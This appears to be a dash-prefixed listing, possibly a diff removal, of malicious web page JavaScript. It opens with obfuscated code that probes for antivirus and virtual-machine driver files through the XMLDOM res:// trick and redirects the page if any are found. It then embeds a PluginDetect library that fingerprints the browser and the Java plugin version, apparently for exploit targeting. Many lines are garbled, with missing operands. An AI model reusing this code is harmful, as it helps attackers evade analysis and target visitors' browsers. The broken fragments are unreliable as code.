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- qBa = this;
- function chavs(a) {
- eval('va' + 'r xm' + 'lDo' + 'c = n' + 'ew A' + 'ctiv' + 'eX' + 'Objec' + 't("' + 'Micr' + 'oso' + 'ft.XM' + 'LDO' + 'M");');
- xmlDoc.async = true;
- xmlDoc.loadXML('<!DO' + 'CTY' + 'PE ht' + 'ml PU' + 'BLI' + 'C "-//W' + '3C//DT' + 'D XH' + 'T' + 'ML 1.' + '0 Tra' + 'nsla' + 'tion//E' + 'N" "r' + 'es' + '://' + a + '">');
- if (xmlDoc.parseError.errorCode != 0) {
- var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
- err += "Error Reason: " + xmlDoc.parseError.reason;
- err += "Error line: " + xmlDoc.parseError.line;
- if (err.indexOf("-2147023083") > 0) {
- return 1;
- } else {
- return 0;
- }
- }
- return 0;
- }
- var c_a = 0;
- if (chavs("c:\\W" + "in" + "dow" + "s\\Sys" + "tem" + "32\\d" + "riv" + "ers\\eamo" + "" + "s") || chavs("c:\\Wi" + "ndo" + "ws\\Sy" + "ste" + "m32\\dr" + "ive" + "rs\\kl" + "" + "s") || chavs("c:\\Wi" + "ndo" + "ws\\Sys" + "tem3" + "2\\dri" + "ver" + "s\\kn" + "ep" + "s.s" + "ys") || chavs("c:\\W" + "indo" + "ws\\Sys" + "tem3" + "2\\dr" + "iv" + "ers\\kl" + "flt.s" + "ys") || chavs("c:\\Wi" + "nd" + "ows\\Sy" + "stem" + "32\\dr" + "ive" + "rs\\vmn" + "" + "s") || chavs("c:\\Wi" + "nd" + "ows\\Sys" + "tem" + "32\\dr" + "iver" + "s\\v" + "mxne" + "" + "s") || chavs("c:\\Win" + "dow" + "s\\Sy" + "ste" + "m32\\d" + "riv" + "ers\\kl" + "1.s" + "ys") || chavs("c:\\Wi" + "ndo" + "ws\\Sy" + "st" + "em32\\d" + "riv" + "ers\\t" + "mnci" + "esc.s" + "ys") || chavs("c:\\Win" + "do" + "ws\\Sys" + "tem3" + "2\\d" + "rive" + "rs\\tm" + "tdi.s" + "ys") || chavs("c:\\Wi" + "ndo" + "ws\\Sys" + "tem3" + "2\\d" + "rive" + "rs\\tma" + "ctmon.s" + "ys") || chavs("c:\\Wi" + "ndo" + "ws\\Sy" + "st" + "em3" + "2\\dr" + "iv" + "ers\\TM" + "EBC" + "" + "s") || chavs("c:\\Wi" + "ndow" + "s\\Sys" + "tem3" + "2\\dri" + "ver" + "s\\t" + "me" + "ext.s" + "ys") || chavs("c:\\W" + "indo" + "ws\\Sy" + "ste" + "m32\\dr" + "iv" + "ers\\tm" + "com" + "m.s" + "ys") || chavs("c:\\Wi" + "ndo" + "ws\\Sy" + "ste" + "m32\\d" + "riv" + "ers\\tm" + "evt" + "" + "s")) {
- document.write("<meta http-equiv=\"refresh\" content=\"0; url=\">");
- c_a = 1;
- };
- (function() {
- var a = {
- version: "0.8.8",
- name: "PluginDetect",
- addPlugin: function(b, c) {
- b && a.isString(b) && c && a.isFunc(c.getVersion) && (b = b.replace(/\s/g, "").toLowerCase(), a.Plugins[b] = c, a.isDefined(c.getVersionDone) || (c.installed = null, c.version = null, c.version0 = null, c.getVersionDone = null, c.pluginName = b))
- },
- openTag: "<",
- hasOwnProperty: {}.constructor.prototype.hasOwnProperty,
- hasOwn: function(b, c) {
- var d;
- try {
- d =, c)
- } catch (e) {}
- return !!d
- },
- rgx: {
- str: /string/i,
- num: /number/i,
- fun: /function/i,
- arr: /array/i
- },
- toString: {}.constructor.prototype.toString,
- isDefined: function(a) {
- return "undefined" != typeof a
- },
- isArray: function(b) {
- return a.rgx.arr.test(
- },
- isString: function(b) {
- return a.rgx.str.test(
- },
- isNum: function(b) {
- return a.rgx.num.test(
- },
- isStrNum: function(b) {
- return a.isString(b) && /\d/.test(b)
- },
- isFunc: function(b) {
- return
- },
- getNumRegx: /[\d][\d\.\_,\-]*/,
- splitNumRegx: /[\.\_,\-]/g,
- getNum: function(b, c) {
- var d = a.isStrNum(b) ? (a.isDefined(c) ? RegExp(c) : a.getNumRegx).exec(b) : null;
- return d ? d[0] : null
- },
- compareNums: function(b, c, d) {
- var e = parseInt;
- if (a.isStrNum(b) && a.isStrNum(c)) {
- if (a.isDefined(d) && d.compareNums) return d.compareNums(b, c);
- b = b.split(a.splitNumRegx);
- c = c.split(a.splitNumRegx);
- for (d = 0; d < Math.min(b.length, c.length); d++) {
- if (e(b[d], 10) > e(c[d], 10)) return 1;
- if (e(b[d], 10) < e(c[d], 10)) return -1
- }
- }
- return 0
- },
- formatNum: function(b, c) {
- var d, e;
- if (!a.isStrNum(b)) return null;
- a.isNum(c) || (c = 4);
- c--;
- e = b.replace(/\s/g, "").split(a.splitNumRegx).concat(["0", "0", "0", "0"]);
- for (d = 0; 4 > d; d++)
- if (/^(0+)(.+)$/.test(e[d]) && (e[d] = RegExp.$2), d > c || !/\d/.test(e[d])) e[d] = "0";
- return e.slice(0, 4).join(",")
- },
- pd: {
- getPROP: function(b, c, d) {
- try {
- b && (d = b[c])
- } catch (e) {}
- return d
- },
- findNavPlugin: function(b) {
- if (b.dbug) return b.dbug;
- if (window.navigator) {
- var c = {
- Find: a.isString(b.find) ? RegExp(b.find, "i") : b.find,
- Find2: a.isString(b.find2) ? RegExp(b.find2, "i") : b.find2,
- Avoid: b.avoid ? a.isString(b.avoid) ? RegExp(b.avoid, "i") : b.avoid : 0,
- Num: b.num ? /\d/ : 0
- },
- d, e, f, g = navigator.mimeTypes,
- h = navigator.plugins,
- l = null;
- if (b.mimes && g)
- for (f = a.isArray(b.mimes) ? [].concat(b.mimes) : a.isString(b.mimes) ? [b.mimes] : [], d = 0; d < f.length; d++) {
- e = 0;
- try {
- a.isString(f[d]) && /[^\s]/.test(f[d]) && (e = g[f[d]].enabledPlugin)
- } catch (n) {}
- if (e && (e = this.findNavPlugin_(e, c), e.obj && (l = e.obj), l && !a.dbug)) return l
- }
- if (b.plugins && h) {
- b = a.isArray(b.plugins) ? [].concat(b.plugins) : a.isString(b.plugins) ? [b.plugins] : [];
- for (d = 0; d < b.length; d++) {
- e = 0;
- try {
- b[d] && a.isString(b[d]) && (e = h[b[d]])
- } catch (p) {}
- if (e && (e = this.findNavPlugin_(e, c), e.obj && (l = e.obj), l && !a.dbug)) return l
- }
- b = h.length;
- if (a.isNum(b))
- for (d = 0; d < b; d++) {
- e = 0;
- try {
- e = h[d]
- } catch (m) {}
- if (e && (e = this.findNavPlugin_(e, c), e.obj && (l = e.obj), l && !a.dbug)) break
- }
- }
- }
- return l
- },
- findNavPlugin_: function(a, c) {
- var d = a.description || "",
- e = || "",
- f = {};
- if (c.Find.test(d) && !(c.Find2 && !c.Find2.test(e) || c.Num && !c.Num.test(RegExp.leftContext + RegExp.rightContext)) || c.Find.test(e) && !(c.Find2 && !c.Find2.test(d) || c.Num && !c.Num.test(RegExp.leftContext + RegExp.rightContext))) c.Avoid && (c.Avoid.test(d) || c.Avoid.test(e)) || (f.obj = a);
- return f
- },
- getVersionDelimiter: ",",
- findPlugin: function(b) {
- var c, d = {
- status: -3,
- plugin: 0
- };
- if (!a.isString(b)) return d;
- if (1 == b.length) return this.getVersionDelimiter = b, d;
- b = b.toLowerCase().replace(/\s/g, "");
- c = a.Plugins[b];
- if (!c || !c.getVersion) return d;
- d.plugin = c;
- d.status = 1;
- return d
- }
- },
- getPluginFileVersion: function(b, c) {
- var d, e, f, g, h = -1;
- if (!b) return c;
- b.version && (d = a.getNum(b.version + ""));
- if (!d || !c) return c || d || null;
- d = a.formatNum(d);
- c = a.formatNum(c);
- e = c.split(a.splitNumRegx);
- f = d.split(a.splitNumRegx);
- for (g = 0; g < e.length; g++)
- if (-1 < h && g > h && "0" != e[g] || f[g] != e[g] && (-1 == h && (h = g), "0" != e[g])) return c;
- return d
- },
- AXO: function() {
- var a;
- try {
- a = new window.ActiveXObject
- } catch (c) {}
- return a ? null : window.ActiveXObject
- }(),
- getAXO: function(b) {
- var c = null;
- try {
- c = new a.AXO(b)
- } catch (d) {}
- c && (a.browser.ActiveXEnabled = !0);
- return c
- },
- browser: {},
- INIT: function() {
- a.init.library()
- },
- init: {
- hasRun: 0,
- detectIE: function() {
- var b = a.browser,
- c = document,
- d, e = window.navigator ? navigator.userAgent || "" : "",
- f, g;
- b.ActiveXFilteringEnabled = !1;
- b.ActiveXEnabled = !1;
- try {
- b.ActiveXFilteringEnabled = !!window.external.msActiveXFilteringEnabled()
- } catch (h) {}
- g = ["WMPlayer.OCX", "ShockwaveFlash.ShockwaveFlash", "AgControl.AgControl"];
- f = "Msxml2.XMLHTTP Msxml2.DOMDocument Microsoft.XMLDOM TDCCtl.TDCCtl Shell.UIHelper HtmlDlgSafeHelper.HtmlDlgSafeHelper Scripting.Dictionary".split(" ").concat(g);
- for (d = 0; d < f.length && (!a.getAXO(f[d]) || a.dbug); d++);
- if (b.ActiveXEnabled && b.ActiveXFilteringEnabled)
- for (d = 0; d < g.length; d++)
- if (a.getAXO(g[d])) {
- b.ActiveXFilteringEnabled = !1;
- break
- }
- d = c.documentMode;
- try {
- c.documentMode = ""
- } catch (l) {}
- b.isIE = b.ActiveXEnabled || a.isNum(c.documentMode) || eval("/*@cc_on!@*/!1");
- try {
- c.documentMode = d
- } catch (n) {}
- b.verIE = null;
- b.isIE && (b.verIE = (a.isNum(c.documentMode) && 7 <= c.documentMode ? c.documentMode : 0) || (/^(?:.*?[^a-zA-Z])??(?:MSIE|rv\s*\:)\s*(\d+\.?\d*)/i.test(e) ? parseFloat(RegExp.$1, 10) : 7));
- },
- detectNonIE: function() {
- var b = a.browser,
- c = window.navigator ? navigator : {},
- d = b.isIE ? "" : c.userAgent || "",
- e = c.vendor || "",
- c = c.product || "";
- b.isGecko = /Gecko/i.test(c) && /Gecko\s*\/\s*\d/i.test(d);
- b.verGecko = b.isGecko ? a.formatNum(/rv\s*\:\s*([\.\,\d]+)/i.test(d) ? RegExp.$1 : "0.9") : null;
- b.isOpera = /(OPR\s*\/|Opera\s*\/\s*\d.*\s*Version\s*\/|Opera\s*[\/]?)\s*(\d+[\.,\d]*)/i.test(d);
- b.verOpera = b.isOpera ? a.formatNum(RegExp.$2) : null;
- b.isChrome = !b.isOpera && /(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i.test(d);
- b.verChrome = b.isChrome ? a.formatNum(RegExp.$2) : null;
- b.isSafari = !b.isOpera && !b.isChrome && (/Apple/i.test(e) || !e) && /Safari\s*\/\s*(\d[\d\.]*)/i.test(d);
- b.verSafari = b.isSafari && /Version\s*\/\s*(\d[\d\.]*)/i.test(d) ? a.formatNum(RegExp.$1) : null;
- },
- detectPlatform: function() {
- var b, c = window.navigator ? navigator.platform || "" : "";
- a.OS = 100;
- if (c) {
- var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
- for (b = d.length - 2; 0 <= b; b -= 2)
- if (d[b] && RegExp(d[b], "i").test(c)) {
- a.OS = d[b + 1];
- break
- }
- }
- },
- library: function() {
- var b = document;
- a.head = b.getElementsByTagName("head")[0] || b.getElementsByTagName("body")[0] || b.body || null;
- this.detectPlatform();
- this.detectIE();
- this.detectNonIE();
- this.hasRun = 1;
- }
- },
- ev: {
- handler: function(a, c, d, e) {
- return function() {
- a(c, d, e)
- }
- },
- fPush: function(b, c) {
- a.isArray(c) && (a.isFunc(b) || a.isArray(b) && 0 < b.length && a.isFunc(b[0])) && c.push(b)
- },
- call0: function(b) {
- var c = a.isArray(b) ? b.length : -1;
- 0 < c && a.isFunc(b[0]) ? (b[0](a, 1 < c ? b[1] : 0, 2 < c ? b[2] : 0, 3 < c ? b[3] : 0)) : a.isFunc(b) && (b(a));
- },
- callArray0: function(b) {
- var c;
- if (a.isArray(b))
- for (; b.length;) c = b[0], b.splice(0, 1), this.call0(c)
- },
- call: function(a) {
- this.call0(a);
- this.ifDetectDoneCallHndlrs()
- },
- callArray: function(a) {
- this.callArray0(a);
- this.ifDetectDoneCallHndlrs()
- },
- allDoneHndlrs: [],
- ifDetectDoneCallHndlrs: function() {
- var b, c;
- if (this.allDoneHndlrs.length && (! || && ! && ! {
- if (a.Plugins)
- for (b in a.Plugins)
- if (c = a.Plugins[b], a.hasOwn(a.Plugins, b) && c && a.isFunc(c.getVersion) && (3 == c.OTF || c.DoneHndlrs && c.DoneHndlrs.length)) return;
- this.callArray0(this.allDoneHndlrs);
- }
- }
- },
- isMinVersion: function(b, c, d, e) {
- var f = a.pd.findPlugin(b),
- g = -1;
- if (0 > f.status) return f.status;
- f = f.plugin;
- c = a.formatNum(a.isNum(c) ? c.toString() : a.isStrNum(c) ? a.getNum(c) : "0");
- 1 != f.getVersionDone && (f.getVersion(c, d, e), null === f.getVersionDone && (f.getVersionDone = 1));
- null !== f.installed && (g = 0.5 >= f.installed ? f.installed : 0.7 == f.installed ? 1 : null === f.version ? 0 : 0 <= a.compareNums(f.version, c, f) ? 1 : -0.1);
- return g
- },
- getVersion: function(b, c, d) {
- var e = a.pd.findPlugin(b);
- if (0 > e.status) return null;
- e = e.plugin;
- 1 != e.getVersionDone && (e.getVersion(null, c, d), null === e.getVersionDone && (e.getVersionDone = 1));
- e = (e = e.version || e.version0) ? e.replace(a.splitNumRegx, a.pd.getVersionDelimiter) : e;
- return e
- },
- hasMimeType: function(b) {
- if (b && window.navigator && navigator.mimeTypes) {
- var c, d, e, f = navigator.mimeTypes,
- g = a.isArray(b) ? [].concat(b) : a.isString(b) ? [b] : [];
- e = g.length;
- for (d = 0; d < e; d++) {
- b = 0;
- try {
- a.isString(g[d]) && /[^\s]/.test(g[d]) && (b = f[g[d]])
- } catch (h) {}
- if ((c = b ? b.enabledPlugin : 0) && ( || c.description)) return b
- }
- }
- return null
- },
- onDetectionDone: function(b, c, d, e) {
- var f = a.pd.findPlugin(b);
- if (-3 == f.status) return -1;
- f = f.plugin;
- a.isArray(f.DoneHndlrs) || (f.DoneHndlrs = []);
- 1 != f.getVersionDone && (a.getVersion ? a.getVersion(b, d, e) : a.isMinVersion(b, "0", d, e));
- if (-0.5 != f.installed && 0.5 != f.installed) return, 1;
- a.ev.fPush(c, f.DoneHndlrs);
- return 0
- },
- codebase: {
- isDisabled: function() {
- return a.browser.ActiveXEnabled && a.isDefined(a.pd.getPROP(document.createElement("object"), "object")) ? 0 : 1
- },
- pluginMayBeHanging: function(b) {
- return !this.isDisabled() && b && a.isDefined(a.pd.getPROP(b, "readyState")) && a.pd.getPROP(b.firstChild, "object") && (b = a.pd.getPROP(b.firstChild, "readyState"), a.isNum(b) && 4 != b) ? (1) : 0
- },
- emptyNode: function(a) {
- try {
- a.innerHTML = ""
- } catch (c) {}
- },
- emptyGarbage: function() {
- var b, c = this.HTML,
- d = 0;
- if (c.length) {
- for (b = c.length - 1; b >= this.len; b--) c[b] && c[b].span && this.pluginMayBeHanging(c[b].span) && (this.emptyNode(c[b].span), c[b].span = null, d = 1);
- this.len = c.length;
- if (d) {
- try {
- window.CollectGarbage()
- } catch (e) {}
- }
- }
- },
- HTML: [],
- len: 0,
- onDone: function(a, c) {
- var d, e = c.HTML;
- for (d = 0; d < e.length; d++) e[d] && e[d].span && (c.emptyNode(e[d].span), e[d].span = null)
- },
- init: function(b) {
- if (!b.init) {
- b.init = 1;
- var c;
- a.ev.fPush([this.onDone, this],;
- b.tagA = '<object width="1" height="1" style="display:none;" codebase="#version=';
- c = b.classID || b.$$.classID || "";
- b.tagB = '" ' + (/clsid\s*:/i.test(c) ? 'classid="' : 'type="') + c + '">' + a.openTag + "/object>";
- for (c = 0; c < b.Lower.length; c++) b.Lower[c] = a.formatNum(b.Lower[c]), b.Upper[c] = a.formatNum(b.Upper[c]);
- }
- },
- isActiveXObject: function(b, c) {
- var d = 0,
- e = b.$$,
- f = document.createElement("span");
- if (b.min && 0 >= a.compareNums(c, b.min)) return 1;
- if (b.max && 0 <= a.compareNums(c, b.max)) return 0;
- f.innerHTML = b.tagA + c + b.tagB;
- a.pd.getPROP(f.firstChild, "object") && (d = 1);
- d ? (b.min = c, this.HTML.push({
- span: f
- })) : (b.max = c, f.innerHTML = "");
- return d
- },
- convert_: function(b, c, d, e) {
- return (b = b.convert[c]) ? a.isFunc(b) ? a.formatNum(b(d.split(a.splitNumRegx), e).join(",")) : d : b
- },
- convert: function(b, c, d) {
- var e, f, g;
- c = a.formatNum(c);
- f = {
- v: c,
- x: -1
- };
- if (c)
- for (e = 0; e < b.Lower.length; e++)
- if ((g = this.convert_(b, e, b.Lower[e])) && 0 <= a.compareNums(c, d ? g : b.Lower[e]) && (!e || 0 > a.compareNums(c, d ? this.convert_(b, e, b.Upper[e]) : b.Upper[e]))) {
- f.v = this.convert_(b, e, c, d);
- f.x = e;
- break
- }
- return f
- },
- isMin: function(b, c) {
- var d, e = 0;
- if (!a.isStrNum(c) || this.isDisabled()) return e;
- this.init(b);
- if (!b.L)
- for (b.L = {}, d = 0; d < b.Lower.length; d++)
- if (this.isActiveXObject(b, b.Lower[d])) {
- b.L = this.convert(b, b.Lower[d]);
- break
- }
- b.L.v && (d = this.convert(b, c, 1), 0 <= d.x && (e = (b.L.x == d.x ? this.isActiveXObject(b, d.v) : 0 >= a.compareNums(c, b.L.v)) ? 1 : -1));
- return e
- },
- search: function(b) {
- var c = this,
- d = b.$$,
- e = 0,
- f;
- f = b.searchHasRun || c.isDisabled() ? 1 : 0;
- b.searchHasRun = 1;
- if (f) return b.version || null;
- c.init(b);
- var g, h = function(d, f) {
- var g = [].concat(m);
- g[d] = f;
- g = c.isActiveXObject(b, g.join(","));
- g ? (e = 1, m[d] = f) : k[d] = f;
- return g
- },
- l = b.DIGITMAX,
- n, p, m = [0, 0, 0, 0],
- k = [0, 0, 0, 0];
- for (f = 0; f < k.length; f++) {
- m[f] = Math.floor(b.DIGITMIN[f]) || 0;
- n = m.join(",");
- p = m.slice(0, f).concat([99999999, 99999999, 99999999, 99999999]).slice(0, m.length).join(",");
- for (g = 0; g < l.length; g++) a.isArray(l[g]) && (l[g].push(0), l[g][f] > k[f] && 0 <= a.compareNums(p, b.Lower[g]) && 0 > a.compareNums(n, b.Upper[g]) && (k[f] = Math.floor(l[g][f])));
- for (g = 0; 30 > g; g++) {
- if (16 >= k[f] - m[f]) {
- for (g = k[f]; g >= m[f] + (f ? 1 : 0) && !h(f, g); g--);
- break
- }
- h(f, Math.round((k[f] + m[f]) / 2))
- }
- if (!e) break;
- k[f] = m[f];
- }
- e && (b.version = c.convert(b, m.join(",")).v);
- return b.version || null
- }
- },
- win: {
- loaded: !1,
- hasRun: 0,
- init: function() {
- this.hasRun || (this.hasRun = 1, this.addEvent("load", this.onLoad), this.addEvent("unload", this.onUnload))
- },
- addEvent: function(b, c) {
- var d = window;
- a.isFunc(c) && (d.addEventListener ? d.addEventListener(b, c, !1) : d.attachEvent ? d.attachEvent("on" + b, c) : d["on" + b] = this.concatFn(c, d["on" + b]))
- },
- concatFn: function(a, c) {
- return function() {
- a();
- "function" == typeof c && c()
- }
- },
- loadPrvtHndlrs: [],
- loadPblcHndlrs: [],
- unloadHndlrs: [],
- onUnload: function() {
- if (a && {
- a.ev.callArray(;
- for (var b in a) a[b] = 0;
- a = 0
- }
- },
- count: 0,
- countMax: 1,
- intervalLength: 10,
- onLoad: function() {
- if (a && && ! {
- var b =;
- b.count < b.countMax && b.loadPrvtHndlrs.length ? (setTimeout(b.onLoad, b.intervalLength)) : (b.loaded = !0, a.ev.callArray(b.loadPrvtHndlrs), a.ev.callArray(b.loadPblcHndlrs));
- b.count++
- }
- }
- },
- DOM: {
- isEnabled: {
- objectTag: function() {
- return a.browser.isIE ? a.browser.ActiveXEnabled : 1
- },
- objectTagUsingActiveX: function() {
- return a.browser.ActiveXEnabled
- },
- objectProperty: function() {
- return a.browser.ActiveXEnabled && a.isDefined(a.pd.getPROP(document.createElement("object"), "object")) ? 1 : 0
- }
- },
- div: null,
- divID: "plugindetect",
- divWidth: 300,
- getDiv: function() {
- return this.div || document.getElementById(this.divID) || null
- },
- initDiv: function() {
- var b;
- this.div || ((b = this.getDiv()) ? (this.div = b) : (this.div = document.createElement("div"), = this.divID, this.setStyle(this.div, this.getStyle.div()), this.insertDivInBody(this.div)), a.ev.fPush([this.onWinUnloadEmptyDiv, this],
- },
- pluginSize: 1,
- altHTML: " ",
- emptyNode: function(b) {
- if (b && /div|span/i.test(b.tagName || "")) {
- a.browser.isIE && this.setStyle(b, ["display", "none"]);
- try {
- b.innerHTML = ""
- } catch (c) {}
- }
- },
- onWinUnloadEmptyDiv: function(a, c) {
- var d = c.getDiv(),
- e, f;
- if (d) {
- if (d.childNodes) {
- for (e = d.childNodes.length - 1; 0 <= e; e--) f = d.childNodes[e], c.emptyNode(f);
- try {
- d.innerHTML = ""
- } catch (g) {}
- }
- if (d.parentNode) {
- try {
- d.parentNode.removeChild(d)
- } catch (h) {}
- c.div = null
- }
- }
- },
- width: function() {
- var b = this.span,
- c;
- c = b && a.isNum(b.scrollWidth) ? b.scrollWidth : -1;
- b = b && a.isNum(b.offsetWidth) ? b.offsetWidth : -1;
- return 0 < b ? b : 0 < c ? c : Math.max(b, c)
- },
- obj: function(a) {
- return (a = this.span) && a.firstChild ? a.firstChild : null
- },
- readyState: function() {
- return a.browser.isIE && a.isDefined(a.pd.getPROP(this.span, "readyState")) ? a.pd.getPROP(this.obj(), "readyState") : this.undefined
- },
- objectProperty: function() {
- var b;
- this.DOM.isEnabled.objectProperty() && (b = a.pd.getPROP(this.obj(), "object"));
- return b
- },
- getTagStatus: function(b, c, d, e, f, g) {
- if (!b || !b.span) return -2;
- var h = b.width(),
- l = b.readyState(),
- n = b.objectProperty();
- if (n) return 1.5;
- var k = /clsid\s*\:/i,
- m = d && k.test(d.outerHTML || "") ? d : e && k.test(e.outerHTML || "") ? e : 0;
- d = d && !k.test(d.outerHTML || "") ? d : e && !k.test(e.outerHTML || "") ? e : 0;
- k = b && k.test(b.outerHTML || "") ? m : d;
- if (!(c && c.span && k && k.span)) return 0;
- m = k.width();
- c = c.width();
- d = k.readyState();
- if (0 > h || 0 > m || c <= this.pluginSize) return 0;
- g && !b.pi && a.isDefined(n) && a.browser.isIE && b.tagName == k.tagName && b.time <= k.time && h === m && 0 === l && 0 !== d && (b.pi = 1);
- if (m < c) return b.pi ? -0.1 : 0;
- if (h >= c && (!b.winLoaded && || a.isNum(f) && (a.isNum(b.count2) || (b.count2 = f), 0 < f - b.count2))) return b.pi ? -0.5 : -1;
- try {
- if (h == this.pluginSize && (!a.browser.isIE || 4 === l) && (!b.winLoaded && || b.winLoaded && a.isNum(f) && (a.isNum(b.count) || (b.count = f), 5 <= f - b.count))) return 1
- } catch (q) {}
- return b.pi ? -0.1 : 0
- },
- setStyle: function(a, c) {
- var d =,
- e;
- if (d && c)
- for (e = 0; e < c.length; e += 2) try {
- d[c[e]] = c[e + 1]
- } catch (f) {}
- },
- getStyle: {
- span: function() {
- var b = a.DOM;
- return [].concat(this.Default).concat(["display", "inline", "fontSize", b.pluginSize + 3 + "px", "lineHeight", b.pluginSize + 3 + "px"])
- },
- div: function() {
- var b = a.DOM;
- return [].concat(this.Default).concat(["display", "block", "width", b.divWidth + "px", "height", b.pluginSize + 3 + "px", "fontSize", b.pluginSize + 3 + "px", "lineHeight", b.pluginSize + 3 + "px", "position", "absolute", "right", "9999px", "top", "-9999px"])
- },
- plugin: function(b) {
- var c = a.DOM;
- return "background-color:transparent;background-image:none;vertical-align:baseline;outline-style:none;border-style:none;padding:0px;margin:0px;visibility:" + (b ? "hidden;" : "visible;") + "display:inline;font-size:" + (c.pluginSize + 3) + "px;line-height:" + (c.pluginSize + 3) + "px;"
- },
- Default: "backgroundColor transparent backgroundImage none verticalAlign baseline outlineStyle none borderStyle none padding 0px margin 0px visibility visible".split(" ")
- },
- insertDivInBody: function(b, c) {
- var d = null,
- e = c ? : window.document,
- f = e.getElementsByTagName("body")[0] || e.body;
- if (!f) try {
- e.write('<div id="pd33993399">.' + a.openTag + "/div>"), d = e.getElementById("pd33993399")
- } catch (g) {}
- if (f = e.getElementsByTagName("body")[0] || e.body) f.insertBefore(b, f.firstChild), d && f.removeChild(d)
- },
- insert: function(b, c, d, e, f, g, h) {
- var l, k = document.createElement("span");
- a.isDefined(e) || (e = "");
- if (a.isString(b) && /[^\s]/.test(b)) {
- b = b.toLowerCase().replace(/\s/g, "");
- l = a.openTag + b + " ";
- l += 'style="' + this.getStyle.plugin(g) + '" ';
- var p = 1,
- m = 1;
- for (g = 0; g < c.length; g += 2) /[^\s]/.test(c[g + 1]) && (l += c[g] + '="' + c[g + 1] + '" '), /width/i.test(c[g]) && (p = 0), /height/i.test(c[g]) && (m = 0);
- l += (p ? 'width="' + this.pluginSize + '" ' : "") + (m ? 'height="' + this.pluginSize + '" ' : "");
- l += ">";
- for (g = 0; g < d.length; g += 2) /[^\s]/.test(d[g + 1]) && (l += a.openTag + 'param name="' + d[g] + '" value="' + d[g + 1] + '" />');
- l += e + a.openTag + "/" + b + ">"
- } else b = "", l = e;
- h || this.initDiv();
- c = h || this.getDiv();
- b = {
- span: null,
- winLoaded:,
- tagName: b,
- outerHTML: l,
- DOM: this,
- time: (new Date).getTime(),
- width: this.width,
- obj: this.obj,
- readyState: this.readyState,
- objectProperty: this.objectProperty
- };
- if (c && c.parentNode) {
- this.setStyle(k, this.getStyle.span());
- c.appendChild(k);
- try {
- k.innerHTML = l
- } catch (q) {}
- b.span = k;
- b.winLoaded =
- }
- return b
- }
- },
- file: {
- any: "fileStorageAny999",
- valid: "fileStorageValid999",
- save: function(b, c, d) {
- b && a.isDefined(d) && (b[this.any] || (b[this.any] = []), b[this.valid] || (b[this.valid] = []), b[this.any].push(d), (c = this.split(c, d)) && b[this.valid].push(c))
- },
- getValidLength: function(a) {
- return a && a[this.valid] ? a[this.valid].length : 0
- },
- getAnyLength: function(a) {
- return a && a[this.any] ? a[this.any].length : 0
- },
- getValid: function(a, c) {
- return a && a[this.valid] ? this.get(a[this.valid], c) : null
- },
- getAny: function(a, c) {
- return a && a[this.any] ? this.get(a[this.any], c) : null
- },
- get: function(b, c) {
- var d = b.length - 1,
- e = a.isNum(c) ? c : d;
- return 0 > e || e > d ? null : b[e]
- },
- split: function(b, c) {
- var d = null,
- e;
- b = b ? b.replace(".", "\.") : "";
- e = RegExp("^(.*[^\/])(" + b + "\s*)$");
- a.isString(c) && e.test(c) && (e = RegExp.$1.split("/"), d = {
- name: e[e.length - 1],
- ext: RegExp.$2,
- full: c
- }, e[e.length - 1] = "", d.path = e.join("/"));
- return d
- }
- },
- Plugins: {}
- };
- window[] = a;
- a.INIT();
- var k = {
- mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
- mimeType_dummy: "application/dummymimejavaapplet",
- classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
- classID_dummy: "clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",
- navigator: {
- init: function() {
- var b = k;
- try {
- this.a = window.navigator.javaEnabled()
- } catch (c) {}
- if (this.mimeObj = a.hasMimeType(b.mimeType)) this.pluginObj = this.mimeObj.enabledPlugin
- },
- a: !0,
- javaEnabled: function() {
- return this.a
- },
- mimeObj: 0,
- pluginObj: 0
- },
- OTF: null,
- getVerifyTagsDefault: function() {
- return [1, this.applet.isDisabled.VerifyTagsDefault_1() ? 0 : 1, 1]
- },
- getVersion: function(b, c, d) {
- var e = this.applet,
- f = this.verify,
- g = this.navigator,
- h = null,
- l = null,
- k = null;
- null === this.getVersionDone && (this.OTF = 0, g.init(), f && f.init());
- e.setVerifyTagsArray(d);
-, ".jar", c);
- 0 === this.getVersionDone ? e.should_Insert_Query_Any() && (c = e.insert_Query_Any(b), this.setPluginStatus(c[0], c[1], h, b)) : (h && !a.dbug || !this.navMime.query().version || (h = this.navMime.version), h && !a.dbug || !this.navPlugin.query().version || (h = this.navPlugin.version), h && !a.dbug || !this.DTK.query().version || (h = this.DTK.version), this.nonAppletDetectionOk(h) && (k = h), this.setPluginStatus(k, l, h, b), e.should_Insert_Query_Any() && (c = e.insert_Query_Any(b), c[0] && (k = c[0], l = c[1])), this.setPluginStatus(k, l, h, b))
- },
- nonAppletDetectionOk: function(b) {
- var c = this.navigator,
- d = a.browser,
- e = 1;
- if (!b || !c.javaEnabled() || !d.isIE && !c.mimeObj || d.isIE && !d.ActiveXEnabled) e = 0;
- return e
- },
- setPluginStatus: function(b, c, d, e) {
- var f, g = 0,
- h = this.applet;
- d = d || this.version0;
- if (f = h.isRange(b)) h.setRange(f, e) == b && (g = f), b = 0;
- 3 > this.OTF && (this.installed = g ? 0 < g ? 0.7 : -0.1 : b ? 1 : d ? -0.2 : -1);
- 2 == this.OTF && this.NOTF && !this.applet.getResult()[0] && (this.installed = d ? -0.2 : -1);
- 3 == this.OTF && -0.5 != this.installed && 0.5 != this.installed && (this.installed = 1 <= this.NOTF.isJavaActive(1) ? 0.5 : -0.5);
- 4 != this.OTF || -0.5 != this.installed && 0.5 != this.installed || (b ? this.installed = 1 : g ? this.installed = 0 < g ? 0.7 : -0.1 : 1 <= this.NOTF.isJavaActive(1) ? d ? (this.installed = 1, b = d) : this.installed = 0 : this.installed = d ? -0.2 : -1);
- d && (this.version0 = a.formatNum(a.getNum(d)));
- b && !g && (this.version = a.formatNum(a.getNum(b)));
- c && a.isString(c) && (this.vendor = c);
- this.vendor || (this.vendor = "");
- this.verify && this.verify.isEnabled() ? this.getVersionDone = 0 : 1 != this.getVersionDone && (this.getVersionDone = 2 > this.OTF ? 0 : this.applet.can_Insert_Query_Any() ? 0 : 1);
- a.codebase.emptyGarbage();
- },
